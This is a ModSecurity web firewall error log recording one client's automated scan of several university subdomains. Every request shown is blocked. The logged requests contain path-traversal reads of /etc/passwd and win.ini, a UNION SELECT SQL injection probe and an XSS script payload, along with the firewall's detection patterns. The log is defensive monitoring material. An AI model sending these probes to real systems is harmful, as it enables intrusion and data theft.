[Tue Aug 29 11:41:13.511433 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAActbJIAAAAH"]
[Tue Aug 29 11:41:15.445654 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAActbKUAAAAH"]
[Tue Aug 29 11:41:15.504388 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAaZ9poAAAAo"]
[Tue Aug 29 11:41:15.524498 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO1268Co-f0AAAcqJLQAAAAG"]
[Tue Aug 29 11:41:15.525622 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAc4ElYAAAAP"]
[Tue Aug 29 11:41:15.527582 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAcoNUUAAAAF"]
[Tue Aug 29 11:41:16.368132 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO127MCo-f0AAAc4ElcAAAAP"]
[Tue Aug 29 11:41:17.507108 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO127cCo-f0AAAcoNU4AAAAF"]
[Tue Aug 29 11:41:18.359834 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcoNU8AAAAF"]
[Tue Aug 29 11:41:18.400236 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcyp24AAAAK"]
[Tue Aug 29 11:41:18.405371 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAaZ9qMAAAAo"]
[Tue Aug 29 11:41:18.596189 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcyp3AAAAAK"]
[Tue Aug 29 11:41:18.630575 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcbSD8AAAAv"]
[Tue Aug 29 11:41:18.631098 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcqJL0AAAAG"]
[Tue Aug 29 11:41:18.632630 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAc0NcEAAAAM"]
[Tue Aug 29 11:41:18.655324 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcbSEAAAAAv"]
[Tue Aug 29 11:41:18.668025 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcyp3MAAAAK"]
[Tue Aug 29 11:41:18.684469 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAYf-QoAAAAD"]
[Tue Aug 29 11:41:19.355793 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAc0NcQAAAAM"]
[Tue Aug 29 11:41:19.357126 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAc2dQgAAAAN"]
[Tue Aug 29 11:41:19.357264 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAYf-Q0AAAAD"]
[Tue Aug 29 11:41:19.371541 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcyp3cAAAAK"]
[Tue Aug 29 11:41:19.385465 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO1278Co-f0AAAYf-Q4AAAAD"]
[Tue Aug 29 11:41:19.385702 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcbSEUAAAAv"]
[Tue Aug 29 11:41:19.440736 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0NcYAAAAM"]
[Tue Aug 29 11:41:19.442507 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAActbLcAAAAH"]
[Tue Aug 29 11:41:19.442968 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcoNVYAAAAF"]
[Tue Aug 29 11:41:19.443542 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcqJMIAAAAG"]
[Tue Aug 29 11:41:19.453677 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAaZ9qsAAAAo"]
[Tue Aug 29 11:41:19.484152 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcqJMMAAAAG"]
[Tue Aug 29 11:41:19.485307 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcyp3kAAAAK"]
[Tue Aug 29 11:41:19.487223 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcoNVcAAAAF"]
[Tue Aug 29 11:41:19.504325 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAc0NcgAAAAM"]
[Tue Aug 29 11:41:19.954889 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0Nc8AAAAM"]
